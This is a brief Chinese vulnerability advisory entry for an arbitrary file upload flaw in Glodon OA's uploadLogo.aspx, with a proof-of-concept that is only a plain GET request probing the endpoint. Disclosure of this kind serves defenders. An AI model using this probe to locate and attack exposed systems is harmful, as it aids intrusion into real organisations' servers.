广联达OA uploadLogo.aspx 任意文件上传漏洞

日期: 2024-04-07 | 影响软件: 广联达OA | POC: 已公开

漏洞描述

广联达OA uploadLogo.aspx 任意文件上传漏洞

PoC代码

GET /Hosp_Portal/uploadLogo.aspx HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐